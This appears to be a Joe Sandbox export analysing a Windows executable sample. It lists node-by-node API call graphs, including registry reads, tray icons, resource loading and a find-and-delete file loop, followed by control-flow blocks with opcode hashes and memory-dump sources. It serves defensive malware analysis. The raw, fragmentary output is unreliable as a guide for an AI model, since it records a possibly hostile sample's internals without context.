1e441b GetCurrentProcess IsWow64Process 96154 1e4437 96151->96154 96152->96153 96153->96151 96159 2237df 96153->96159 96155 1e444f LoadLibraryA 96154->96155 96156 223824 GetSystemInfo 96154->96156 96157 1e449c GetSystemInfo 96155->96157 96158 1e4460 GetProcAddress 96155->96158 96161 1e4476 96157->96161 96158->96157 96160 1e4470 GetNativeSystemInfo 96158->96160 96160->96161 96162 1e447a FreeLibrary 96161->96162 96163 1e109d 96161->96163 96162->96163 96164 2000a3 29 API calls __onexit 96163->96164 96164->96143 96165 222ba5 96166 1e2b25 96165->96166 96167 222baf 96165->96167 96193 1e2b83 7 API calls 96166->96193 96169 1e3a5a 24 API calls 96167->96169 96171 222bb8 96169->96171 96173 1e9cb3 22 API calls 96171->96173 96175 222bc6 96173->96175 96174 1e2b2f 96179 1e3837 49 API calls 96174->96179 96186 1e2b44 96174->96186 96176 222bf5 96175->96176 96177 222bce 96175->96177 96180 1e33c6 22 API calls 96176->96180 96178 1e33c6 22 API calls 96177->96178 96181 222bd9 96178->96181 96179->96186 96182 222bf1 GetForegroundWindow ShellExecuteW 96180->96182 96183 1e6350 22 API calls 96181->96183 96188 222c26 96182->96188 96187 222be7 96183->96187 96185 1e2b5f 96191 1e2b66 SetCurrentDirectoryW 96185->96191 96186->96185 96189 1e30f2 Shell_NotifyIconW 96186->96189 96190 1e33c6 22 API calls 96187->96190 96188->96185 96189->96185 96190->96182 96192 1e2b7a 96191->96192 96197 1e2cd4 7 API calls 96193->96197 96195 1e2b2a 96196 1e2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96195->96196 96196->96174 96197->96195 96198 1e3156 96201 1e3170 96198->96201 96202 1e3187 96201->96202 96203 1e318c 96202->96203 96204 1e31eb 96202->96204 96242 1e31e9 96202->96242 96205 1e3199 96203->96205 96206 1e3265 PostQuitMessage 96203->96206 96208 222dfb 96204->96208 96209 1e31f1 96204->96209 96211 1e31a4 96205->96211 96212 222e7c 96205->96212 96213 1e316a 96206->96213 96207 1e31d0 DefWindowProcW 96207->96213 96256 1e18e2 10 API calls 96208->96256 96214 1e321d SetTimer RegisterWindowMessageW 96209->96214 96215 1e31f8 96209->96215 96217 1e31ae 96211->96217 96218 222e68 96211->96218 96259 24bf30 34 API calls ___scrt_fastfail 96212->96259 96214->96213 96219 1e3246 CreatePopupMenu 96214->96219 96221 222d9c 96215->96221 96222 1e3201 KillTimer 96215->96222 96216 222e1c 96257 1fe499 42 API calls 96216->96257 96225 1e31b9 96217->96225 96226 222e4d 96217->96226 96246 24c161 96218->96246 96219->96213 96228 222da1 96221->96228 96229 222dd7 MoveWindow 96221->96229 96230 1e30f2 Shell_NotifyIconW 96222->96230 96231 1e31c4 96225->96231 96232 1e3253 96225->96232 96226->96207 96258 240ad7 22 API calls 96226->96258 96227 222e8e 96227->96207 96227->96213 96233 222dc6 SetFocus 96228->96233 96234 222da7 96228->96234 96229->96213 96235 1e3214 96230->96235 96231->96207 96243 1e30f2 Shell_NotifyIconW 96231->96243 96254 1e326f 44 API calls ___scrt_fastfail 96232->96254 96233->96213 96234->96231 96238 222db0 96234->96238 96253 1e3c50 DeleteObject DestroyWindow 96235->96253 96255 1e18e2 10 API calls 96238->96255 96240 1e3263 96240->96213 96242->96207 96244 222e41 96243->96244 96245 1e3837 49 API calls 96244->96245 96245->96242 96247 24c276 96246->96247 96248 24c179 ___scrt_fastfail 96246->96248 96247->96213 96249 1e3923 24 API calls 96248->96249 96251 24c1a0 96249->96251 96250 24c25f KillTimer SetTimer 96250->96247 96251->96250 96252 24c251 Shell_NotifyIconW 96251->96252 96252->96250 96253->96213 96254->96240 96255->96213 96256->96216 96257->96231 96258->96242 96259->96227 96260 1e2e37 96261 1ea961 22 API calls 96260->96261 96262 1e2e4d 96261->96262 96339 1e4ae3 96262->96339 96264 1e2e6b 96265 1e3a5a 24 API calls 96264->96265 96266 1e2e7f 96265->96266 96267 1e9cb3 22 API calls 96266->96267 96268 1e2e8c 96267->96268 96353 1e4ecb 96268->96353 96271 222cb0 96391 252cf9 80 API calls ___std_exception_copy 96271->96391 96272 1e2ead 96275 1ea8c7 22 API calls 96272->96275 96274 222cc3 96276 222ccf 96274->96276 96392 1e4f39 96274->96392 96277 1e2ec3 96275->96277 96280 1e4f39 68 API calls 96276->96280 96375 1e6f88 22 API calls 96277->96375 96282 222ce5 96280->96282 96281 1e2ecf 96283 1e9cb3 22 API calls 96281->96283 96398 1e3084 22 API calls 96282->96398 96284 1e2edc 96283->96284 96376 1ea81b 41 API calls 96284->96376 96287 1e2eec 96289 1e9cb3 22 API calls 96287->96289 96288 222d02 96399 1e3084 22 API calls 96288->96399 96290 1e2f12 96289->96290 96377 1ea81b 41 API calls 96290->96377 96293 222d1e 96294 1e3a5a 24 API calls 96293->96294 96295 222d44 96294->96295 96400 1e3084 22 API calls 96295->96400 96296 1e2f21 96299 1ea961 22 API calls 96296->96299 96298 222d50 96300 1ea8c7 22 API calls 96298->96300 96301 1e2f3f 96299->96301 96302 222d5e 96300->96302 96378 1e3084 22 API calls 96301->96378 96401 1e3084 22 API calls 96302->96401 96305 1e2f4b 96379 204a28 40 API calls 3 library calls 96305->96379 96306 222d6d 96310 1ea8c7 22 API calls 96306->96310 96308 1e2f59 96308->96282 96309 1e2f63 96308->96309 96380 204a28 40 API calls 3 library calls 96309->96380 96313 222d83 96310->96313 96312 1e2f6e 96312->96288 96314 1e2f78 96312->96314 96402 1e3084 22 API calls 96313->96402 96381 204a28 40 API calls 3 library calls 96314->96381 96317 222d90 96318 1e2f83 96318->96293 96319 1e2f8d 96318->96319 96382 204a28 40 API calls 3 library calls 96319->96382 96321 1e2f98 96322 1e2fdc 96321->96322 96383 1e3084 22 API calls 96321->96383 96322->96306 96323 1e2fe8 96322->96323 96323->96317 96385 1e63eb 22 API calls 96323->96385 96326 1e2fbf 96328 1ea8c7 22 API calls 96326->96328 96327 1e2ff8 96386 1e6a50 22 API calls 96327->96386 96330 1e2fcd 96328->96330 96384 1e3084 22 API calls 96330->96384 96331 1e3006 96387 1e70b0 23 API calls 96331->96387 96334 1e3021 96336 1e3065 96334->96336 96388 1e6f88 22 API calls 96334->96388 96389 1e70b0 23 API calls 96334->96389 96390 1e3084 22 API calls 96334->96390 96340 1e4af0 __wsopen_s 96339->96340 96341 1e6b57 22 API calls 96340->96341 96342 1e4b22 96340->96342 96341->96342 96343 1e4c6d 22 API calls 96342->96343 96351 1e4b58 96342->96351 96343->96342 96344 1e4c6d 22 API calls 96344->96351 96345 1e9cb3 22 API calls 96347 1e4c52 96345->96347 96346 1e9cb3 22 API calls 96346->96351 96348 1e515f 22 API calls 96347->96348 96350 1e4c5e 96348->96350 96349 1e515f 22 API calls 96349->96351 96350->96264 96351->96344 96351->96346 96351->96349 96352 1e4c29 96351->96352 96352->96345 96352->96350 96403 1e4e90 LoadLibraryA 96353->96403 96358 1e4ef6 LoadLibraryExW 96411 1e4e59 LoadLibraryA 96358->96411 96359 223ccf 96360 1e4f39 68 API calls 96359->96360 96362 223cd6 96360->96362 96364 1e4e59 3 API calls 96362->96364 96366 223cde 96364->96366 96433 1e50f5 40 API calls __fread_nolock 96366->96433 96367 1e4f20 96367->96366 96368 1e4f2c 96367->96368 96370 1e4f39 68 API calls 96368->96370 96372 1e2ea5 96370->96372 96371 223cf5 96434 2528fe 27 API calls 96371->96434 96372->96271 96372->96272 96374 223d05 96375->96281 96376->96287 96377->96296 96378->96305 96379->96308 96380->96312 96381->96318 96382->96321 96383->96326 96384->96322 96385->96327 96386->96331 96387->96334 96388->96334 96389->96334 96390->96334 96391->96274 96393 1e4f4a 96392->96393 96394 1e4f43 96392->96394 96396 1e4f6a FreeLibrary 96393->96396 96397 1e4f59 96393->96397 96498 20e678 96394->96498 96396->96397 96397->96276 96398->96288 96399->96293 96400->96298 96401->96306 96402->96317 96404 1e4ea8 GetProcAddress 96403->96404 96405 1e4ec6 96403->96405 96406 1e4eb8 96404->96406 96408 20e5eb 96405->96408 96406->96405 96407 1e4ebf FreeLibrary 96406->96407 96407->96405 96435 20e52a 96408->96435 96410 1e4eea 96410->96358 96410->96359 96412 1e4e6e GetProcAddress 96411->96412 96413 1e4e8d 96411->96413 96414 1e4e7e 96412->96414 96416 1e4f80 96413->96416 96414->96413 96415 1e4e86 FreeLibrary 96414->96415 96415->96413 96417 1ffe0b 22 API calls 96416->96417 96418 1e4f95 96417->96418 96419 1e5722 22 API calls 96418->96419 96420 1e4fa1 __fread_nolock 96419->96420 96421 1e50a5 96420->96421 96422 223d1d 96420->96422 96432 1e4fdc 96420->96432 96487 1e42a2 CreateStreamOnHGlobal 96421->96487 96495 25304d 74 API calls 96422->96495 96425 223d22 96496 1e511f 64 API calls 96425->96496 96428 223d45 96497 1e50f5 40 API calls __fread_nolock 96428->96497 96431 1e506e messages 96431->96367 96432->96425 96432->96431 96493 1e50f5 40 API calls __fread_nolock 96432->96493 96494 1e511f 64 API calls 96432->96494 96433->96371 96434->96374 96437 20e536 ___BuildCatchObject 96435->96437 96436 20e544 96460 20f2d9 20 API calls __dosmaperr 96436->96460 96437->96436 96439 20e574 96437->96439 96441 20e586 96439->96441 96442 20e579 96439->96442 96440 20e549 96461 2127ec 26 API calls pre_c_initialization 96440->96461 96452 218061 96441->96452 96462 20f2d9 20 API calls __dosmaperr 96442->96462 96446 20e58f 96447 20e5a2 96446->96447 96448 20e595 96446->96448 96464 20e5d4 LeaveCriticalSection __fread_nolock 96447->96464 96463 20f2d9 20 API calls __dosmaperr 96448->96463 96449 20e554 __wsopen_s 96449->96410 96453 21806d ___BuildCatchObject 96452->96453 96465 212f5e EnterCriticalSection 96453->96465 96455 21807b 96466 2180fb 96455->96466 96459 2180ac __wsopen_s 96459->96446 96460->96440 96461->96449 96462->96449 96463->96449 96464->96449 96465->96455 96467 21811e 96466->96467 96468 218177 96467->96468 96475 218088 96467->96475 96482 20918d EnterCriticalSection 96467->96482 96483 2091a1 LeaveCriticalSection 96467->96483 96469 214c7d __dosmaperr 20 API calls 96468->96469 96470 218180 96469->96470 96472 2129c8 _free 20 API calls 96470->96472 96473 218189 96472->96473 96473->96475 96484 213405 11 API calls 2 library calls 96473->96484 96479 2180b7 96475->96479 96476 2181a8 96485 20918d EnterCriticalSection 96476->96485 96486 212fa6 LeaveCriticalSection 96479->96486 96481 2180be 96481->96459 96482->96467 96483->96467 96484->96476 96485->96475 96486->96481 96488 1e42bc FindResourceExW 96487->96488 96492 1e42d9 96487->96492 96489 2235ba LoadResource 96488->96489 96488->96492 96490 2235cf SizeofResource 96489->96490 96489->96492 96491 2235e3 LockResource 96490->96491 96490->96492 96491->96492 96492->96432 96493->96432 96494->96432 96495->96425 96496->96428 96497->96431 96499 20e684 ___BuildCatchObject 96498->96499 96500 20e695 96499->96500 96501 20e6aa 96499->96501 96528 20f2d9 20 API calls __dosmaperr 96500->96528 96510 20e6a5 __wsopen_s 96501->96510 96511 20918d EnterCriticalSection 96501->96511 96504 20e69a 96529 2127ec 26 API calls pre_c_initialization 96504->96529 96505 20e6c6 96512 20e602 96505->96512 96508 20e6d1 96530 20e6ee LeaveCriticalSection __fread_nolock 96508->96530 96510->96393 96511->96505 96513 20e624 96512->96513 96514 20e60f 96512->96514 96520 20e61f 96513->96520 96531 20dc0b 96513->96531 96563 20f2d9 20 API calls __dosmaperr 96514->96563 96516 20e614 96564 2127ec 26 API calls pre_c_initialization 96516->96564 96520->96508 96524 20e646 96548 21862f 96524->96548 96527 2129c8 _free 20 API calls 96527->96520 96528->96504 96529->96510 96530->96510 96532 20dc23 96531->96532 96536 20dc1f 96531->96536 96533 20d955 __fread_nolock 26 API calls 96532->96533 96532->96536 96534 20dc43 96533->96534 96565 2159be 62 API calls 5 library calls 96534->96565 96537 214d7a 96536->96537 96538 214d90 96537->96538 96540 20e640 96537->96540 96539 2129c8 _free 20 API calls 96538->96539 96538->96540 96539->96540 96541 20d955 96540->96541 96542 20d961 96541->96542 96543 20d976 96541->96543 96566 20f2d9 20 API calls __dosmaperr 96542->96566 96543->96524 96545 20d966 96567 2127ec 26 API calls pre_c_initialization 96545->96567 96547 20d971 96547->96524 96549 218653 96548->96549 96550 21863e 96548->96550 96552 21868e 96549->96552 96557 21867a 96549->96557 96571 20f2c6 20 API calls __dosmaperr 96550->96571 96573 20f2c6 20 API calls __dosmaperr 96552->96573 96554 218643 96572 20f2d9 20 API calls __dosmaperr 96554->96572 96555 218693 96574 20f2d9 20 API calls __dosmaperr 96555->96574 96568 218607 96557->96568 96560 20e64c 96560->96520 96560->96527 96561 21869b 96575 2127ec 26 API calls pre_c_initialization 96561->96575 96563->96516 96564->96520 96565->96536 96566->96545 96567->96547 96576 218585 96568->96576 96570 21862b 96570->96560 96571->96554 96572->96560 96573->96555 96574->96561 96575->96560 96577 218591 ___BuildCatchObject 96576->96577 96587 215147 EnterCriticalSection 96577->96587 96579 21859f 96580 2185d1 96579->96580 96581 2185c6 96579->96581 96588 20f2d9 20 API calls __dosmaperr 96580->96588 96582 2186ae __wsopen_s 29 API calls 96581->96582 96584 2185cc 96582->96584 96589 2185fb LeaveCriticalSection __wsopen_s 96584->96589 96586 2185ee __wsopen_s 96586->96570 96587->96579 96588->96584 96589->96586 96590 1e1033 96595 1e4c91 96590->96595 96594 1e1042 96596 1ea961 22 API calls 96595->96596 96597 1e4cff 96596->96597 96604 1e3af0 96597->96604 96599 223cb6 96601 1e4d9c 96601->96599 96602 1e1038 96601->96602 96607 1e51f7 22 API calls __fread_nolock 96601->96607 96603 2000a3 29 API calls __onexit 96602->96603 96603->96594 96608 1e3b1c 96604->96608 96607->96601 96609 1e3b0f 96608->96609 96610 1e3b29 96608->96610 96609->96601 96610->96609 96611 1e3b30 RegOpenKeyExW 96610->96611 96611->96609 96612 1e3b4a RegQueryValueExW 96611->96612 96613 1e3b80 RegCloseKey 96612->96613 96614 1e3b6b 96612->96614 96613->96609 96614->96613 96615 1efe73 96622 1fceb1 96615->96622 96617 1efe89 96631 1fcf92 96617->96631 96619 1efeb3 96643 25359c 82 API calls __wsopen_s 96619->96643 96621 234ab8 96623 1fcebf 96622->96623 96624 1fced2 96622->96624 96644 1eaceb 23 API calls messages 96623->96644 96626 1fced7 96624->96626 96627 1fcf05 96624->96627 96628 1ffddb 22 API calls 96626->96628 96645 1eaceb 23 API calls messages 96627->96645 96630 1fcec9 96628->96630 96630->96617 96632 1e6270 22 API calls 96631->96632 96633 1fcfc9 96632->96633 96634 1e9cb3 22 API calls 96633->96634 96636 1fcffa 96633->96636 96635 23d166 96634->96635 96637 1e6350 22 API calls 96635->96637 96636->96619 96638 23d171 96637->96638 96646 1fd2f0 40 API calls 96638->96646 96640 23d184 96642 23d188 96640->96642 96647 1eaceb 23 API calls messages 96640->96647 96642->96642 96643->96621 96644->96630 96645->96630 96646->96640 96647->96642 96648 1e1cad SystemParametersInfoW 96649 1e1044 96654 1e10f3 96649->96654 96651 1e104a 96690 2000a3 29 API calls __onexit 96651->96690 96653 1e1054 96691 1e1398 96654->96691 96658 1e116a 96659 1ea961 22 API calls 96658->96659 96660 1e1174 96659->96660 96661 1ea961 22 API calls 96660->96661 96662 1e117e 96661->96662 96663 1ea961 22 API calls 96662->96663 96664 1e1188 96663->96664 96665 1ea961 22 API calls 96664->96665 96666 1e11c6 96665->96666 96667 1ea961 22 API calls 96666->96667 96668 1e1292 96667->96668 96701 1e171c 96668->96701 96672 1e12c4 96673 1ea961 22 API calls 96672->96673 96674 1e12ce 96673->96674 96675 1f1940 9 API calls 96674->96675 96676 1e12f9 96675->96676 96722 1e1aab 96676->96722 96678 1e1315 96679 1e1325 GetStdHandle 96678->96679 96680 1e137a 96679->96680 96681 222485 96679->96681 96685 1e1387 OleInitialize 96680->96685 96681->96680 96682 22248e 96681->96682 96683 1ffddb 22 API calls 96682->96683 96684 222495 96683->96684 96686 25011d 5 API calls 96684->96686 96685->96651 96687 22249e 96686->96687 96688 250944 29 API calls 96687->96688 96689 2224aa CloseHandle 96688->96689 96689->96680 96690->96653 96729 1e13f1 96691->96729 96694 1e13f1 22 API calls 96695 1e13d0 96694->96695 96696 1ea961 22 API calls 96695->96696 96697 1e13dc 96696->96697 96698 1e6b57 22 API calls 96697->96698 96699 1e1129 96698->96699 96700 1e1bc3 6 API calls 96699->96700 96700->96658 96702 1ea961 22 API calls 96701->96702 96703 1e172c 96702->96703 96704 1ea961 22 API calls 96703->96704 96705 1e1734 96704->96705 96706 1ea961 22 API calls 96705->96706 96707 1e174f 96706->96707 96708 1ffddb 22 API calls 96707->96708 96709 1e129c 96708->96709 96710 1e1b4a 96709->96710 96711 1e1b58 96710->96711 96712 1ea961 22 API calls 96711->96712 96713 1e1b63 96712->96713 96714 1ea961 22 API calls 96713->96714 96715 1e1b6e 96714->96715 96716 1ea961 22 API calls 96715->96716 96717 1e1b79 96716->96717 96718 1ea961 22 API calls 96717->96718 96719 1e1b84 96718->96719 96720 1ffddb 22 API calls 96719->96720 96721 1e1b96 RegisterWindowMessageW 96720->96721 96721->96672 96723 1e1abb 96722->96723 96724 22272d 96722->96724 96726 1ffddb 22 API calls 96723->96726 96736 253209 23 API calls 96724->96736 96728 1e1ac3 96726->96728 96727 222738 96728->96678 96730 1ea961 22 API calls 96729->96730 96731 1e13fc 96730->96731 96732 1ea961 22 API calls 96731->96732 96733 1e1404 96732->96733 96734 1ea961 22 API calls 96733->96734 96735 1e13c6 96734->96735 96735->96694 96736->96727 96737 2003fb 96738 200407 ___BuildCatchObject 96737->96738 96766 1ffeb1 96738->96766 96740 200561 96793 20083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96740->96793 96742 20040e 96742->96740 96744 200438 96742->96744 96743 200568 96794 204e52 28 API calls _abort 96743->96794 96755 200477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96744->96755 96777 21247d 96744->96777 96746 20056e 96795 204e04 28 API calls _abort 96746->96795 96750 200576 96751 200457 96753 2004d8 96785 200959 96753->96785 96755->96753 96789 204e1a 38 API calls 2 library calls 96755->96789 96757 2004de 96758 2004f3 96757->96758 96790 200992 GetModuleHandleW 96758->96790 96760 2004fa 96760->96743 96761 2004fe 96760->96761 96762 200507 96761->96762 96791 204df5 28 API calls _abort 96761->96791 96792 200040 13 API calls 2 library calls 96762->96792 96765 20050f 96765->96751 96767 1ffeba 96766->96767 96796 200698 IsProcessorFeaturePresent 96767->96796 96769 1ffec6 96797 202c94 10 API calls 3 library calls 96769->96797 96771 1ffecb 96776 1ffecf 96771->96776 96798 212317 96771->96798 96774 1ffee6 96774->96742 96776->96742 96778 212494 96777->96778 96779 200a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 96778->96779 96780 200451 96779->96780 96780->96751 96781 212421 96780->96781 96784 212450 96781->96784 96782 200a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 96783 212479 96782->96783 96783->96755 96784->96782 96849 202340 96785->96849 96787 20096c GetStartupInfoW 96788 20097f 96787->96788 96788->96757 96789->96753 96790->96760 96791->96762 96792->96765 96793->96743 96794->96746 96795->96750 96796->96769 96797->96771 96802 21d1f6 96798->96802 96801 202cbd 8 API calls 3 library calls 96801->96776 96805 21d213 96802->96805 96806 21d20f 96802->96806 96804 1ffed8 96804->96774 96804->96801 96805->96806 96808 214bfb 96805->96808 96820 200a8c 96806->96820 96809 214c07 ___BuildCatchObject 96808->96809 96827 212f5e EnterCriticalSection 96809->96827 96811 214c0e 96828 2150af 96811->96828 96813 214c1d 96818 214c2c 96813->96818 96841 214a8f 29 API calls 96813->96841 96816 214c27 96842 214b45 GetStdHandle GetFileType 96816->96842 96843 214c48 LeaveCriticalSection _abort 96818->96843 96819 214c3d __wsopen_s 96819->96805 96821 200a95 96820->96821 96822 200a97 IsProcessorFeaturePresent 96820->96822 96821->96804 96824 200c5d 96822->96824 96848 200c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96824->96848 96826 200d40 96826->96804 96827->96811 96829 2150bb ___BuildCatchObject 96828->96829 96830 2150c8 96829->96830 96831 2150df 96829->96831 96845 20f2d9 20 API calls __dosmaperr 96830->96845 96844 212f5e EnterCriticalSection 96831->96844 96834 2150cd 96846 2127ec 26 API calls pre_c_initialization 96834->96846 96837 215000 __wsopen_s 21 API calls 96840 2150eb 96837->96840 96838 2150d7 __wsopen_s 96838->96813 96839 215117 96847 21513e LeaveCriticalSection _abort 96839->96847 96840->96837 96840->96839 96841->96816 96842->96818 96843->96819 96844->96840 96845->96834 96846->96838 96847->96838 96848->96826 96850 202357 96849->96850 96850->96787 96850->96850 96851 23d35f 96852 23d30c 96851->96852 96854 24df27 SHGetFolderPathW 96852->96854 96855 1e6b57 22 API calls 96854->96855 96856 24df54 96855->96856 96856->96852 96857 1e2de3 96858 1e2df0 __wsopen_s 96857->96858 96859 1e2e09 96858->96859 96860 222c2b ___scrt_fastfail 96858->96860 96861 1e3aa2 23 API calls 96859->96861 96863 222c47 GetOpenFileNameW 96860->96863 96862 1e2e12 96861->96862 96873 1e2da5 96862->96873 96865 222c96 96863->96865 96866 1e6b57 22 API calls 96865->96866 96868 222cab 96866->96868 96868->96868 96870 1e2e27 96891 1e44a8 96870->96891 96874 221f50 __wsopen_s 96873->96874 96875 1e2db2 GetLongPathNameW 96874->96875 96876 1e6b57 22 API calls 96875->96876 96877 1e2dda 96876->96877 96878 1e3598 96877->96878 96879 1ea961 22 API calls 96878->96879 96880 1e35aa 96879->96880 96881 1e3aa2 23 API calls 96880->96881 96882 1e35b5 96881->96882 96883 1e35c0 96882->96883 96887 2232eb 96882->96887 96884 1e515f 22 API calls 96883->96884 96886 1e35cc 96884->96886 96920 1e35f3 96886->96920 96889 22330d 96887->96889 96926 1fce60 41 API calls 96887->96926 96890 1e35df 96890->96870 96892 1e4ecb 94 API calls 96891->96892 96893 1e44cd 96892->96893 96894 223833 96893->96894 96896 1e4ecb 94 API calls 96893->96896 96928 252cf9 80 API calls ___std_exception_copy 96894->96928 96898 1e44e1 96896->96898 96897 223848 96899 223869 96897->96899 96900 22384c 96897->96900 96898->96894 96901 1e44e9 96898->96901 96903 1ffe0b 22 API calls 96899->96903 96902 1e4f39 68 API calls 96900->96902 96904 223854 96901->96904 96905 1e44f5 96901->96905 96902->96904 96919 2238ae 96903->96919 96929 24da5a 82 API calls 96904->96929 96927 1e940c 136 API calls 2 library calls 96905->96927 96908 1e2e31 96909 223862 96909->96899 96910 1e4f39 68 API calls 96913 223a5f 96910->96913 96913->96910 96935 24989b 82 API calls __wsopen_s 96913->96935 96916 1e9cb3 22 API calls 96916->96919 96919->96913 96919->96916 96930 24967e 22 API calls __fread_nolock 96919->96930 96931 2495ad 42 API calls _wcslen 96919->96931 96932 250b5a 22 API calls 96919->96932 96933 1ea4a1 22 API calls __fread_nolock 96919->96933 96934 1e3ff7 22 API calls 96919->96934 96921 1e3605 96920->96921 96925 1e3624 __fread_nolock 96920->96925 96924 1ffe0b 22 API calls 96921->96924 96922 1ffddb 22 API calls 96923 1e363b 96922->96923 96923->96890 96924->96925 96925->96922 96926->96887 96927->96908 96928->96897 96929->96909 96930->96919 96931->96919 96932->96919 96933->96919 96934->96919 96935->96913

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 389 1e42de-1e434d call 1ea961 GetVersionExW call 1e6b57 394 223617-22362a 389->394 395 1e4353 389->395 397 22362b-22362f 394->397 396 1e4355-1e4357 395->396 398 1e435d-1e43bc call 1e93b2 call 1e37a0 396->398 399 223656 396->399 400 223632-22363e 397->400 401 223631 397->401 417 1e43c2-1e43c4 398->417 418 2237df-2237e6 398->418 404 22365d-223660 399->404 400->397 403 223640-223642 400->403 401->400 403->396 406 223648-22364f 403->406 407 223666-2236a8 404->407 408 1e441b-1e4435 GetCurrentProcess IsWow64Process 404->408 406->394 410 223651 406->410 407->408 411 2236ae-2236b1 407->411 413 1e4437 408->413 414 1e4494-1e449a 408->414 410->399 415 2236b3-2236bd 411->415 416 2236db-2236e5 411->416 419 1e443d-1e4449 413->419 414->419 420 2236ca-2236d6 415->420 421 2236bf-2236c5 415->421 423 2236e7-2236f3 416->423 424 2236f8-223702 416->424 417->404 422 1e43ca-1e43dd 417->422 425 223806-223809 418->425 426 2237e8 418->426 427 1e444f-1e445e LoadLibraryA 419->427 428 223824-223828 GetSystemInfo 419->428 420->408 421->408 431 223726-22372f 422->431 432 1e43e3-1e43e5 422->432 423->408 434 223704-223710 424->434 435 223715-223721 424->435 436 2237f4-2237fc 425->436 437 22380b-22381a 425->437 433 2237ee 426->433 429 1e449c-1e44a6 GetSystemInfo 427->429 430 1e4460-1e446e GetProcAddress 427->430 439 1e4476-1e4478 429->439 430->429 438 1e4470-1e4474 GetNativeSystemInfo 430->438 442 223731-223737 431->442 443 22373c-223748 431->443 440 1e43eb-1e43ee 432->440 441 22374d-223762 432->441 433->436 434->408 435->408 436->425 437->433 444 22381c-223822 437->444 438->439 447 1e447a-1e447b FreeLibrary 439->447 448 1e4481-1e4493 439->448 449 223791-223794 440->449 450 1e43f4-1e440f 440->450 445 223764-22376a 441->445 446 22376f-22377b 441->446 442->408 443->408 444->436 445->408 446->408 447->448 449->408 451 22379a-2237c1 449->451 452 223780-22378c 450->452 453 1e4415 450->453 454 2237c3-2237c9 451->454 455 2237ce-2237da 451->455 452->408 453->408 454->408 455->408
        APIs
        • GetVersionExW.KERNEL32(?), ref: 001E430D
          • Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A
        • GetCurrentProcess.KERNEL32(?,0027CB64,00000000,?,?), ref: 001E4422
        • IsWow64Process.KERNEL32(00000000,?,?), ref: 001E4429
        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 001E4454
        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001E4466
        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 001E4474
        • FreeLibrary.KERNEL32(00000000,?,?), ref: 001E447B
        • GetSystemInfo.KERNEL32(?,?,?), ref: 001E44A0
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
        • String ID: GetNativeSystemInfo$kernel32.dll$|O
        • API String ID: 3290436268-3101561225
        • Opcode ID: 2016962d5d25a28e16aefe6a5c2ec9b8070ff448c1db60c4457af20be7f73880
        • Instruction ID: 40ba96c64887bf90ec0129cce916e0a8fa31405a4b87e500557d129ca31f99c1
        • Opcode Fuzzy Hash: 2016962d5d25a28e16aefe6a5c2ec9b8070ff448c1db60c4457af20be7f73880
        • Instruction Fuzzy Hash: 8BA1D661A1A7D0DFCB15CBB97C6C1A97FE47B26300B984AEDE04593B61F32445A4CB21

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1595 24d3a9-24d3f0 call 1ea961 * 3 call 1e3aa2 call 24e199 1606 24d400-24d431 call 1e525f FindFirstFileW 1595->1606 1607 24d3f2-24d3fb call 1e33c6 1595->1607 1611 24d4a0-24d4a7 FindClose 1606->1611 1612 24d433-24d435 1606->1612 1607->1606 1614 24d4ab-24d4cd call 1e988f * 3 1611->1614 1612->1611 1613 24d437-24d43c 1612->1613 1615 24d43e-24d479 call 1ea8c7 call 1e6350 call 1e33c6 DeleteFileW 1613->1615 1616 24d47b-24d48d FindNextFileW 1613->1616 1615->1616 1630 24d497-24d49e FindClose 1615->1630 1616->1612 1619 24d48f-24d495 1616->1619 1619->1612 1630->1614
        APIs
          • Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2
          • Part of subcall function 0024E199: GetFileAttributesW.KERNELBASE(?,0024CF95), ref: 0024E19A
        • FindFirstFileW.KERNELBASE(?,?), ref: 0024D420
        • DeleteFileW.KERNELBASE(?,?,?,?), ref: 0024D470
        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0024D481
        • FindClose.KERNEL32(00000000), ref: 0024D498
        • FindClose.KERNEL32(00000000), ref: 0024D4A1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
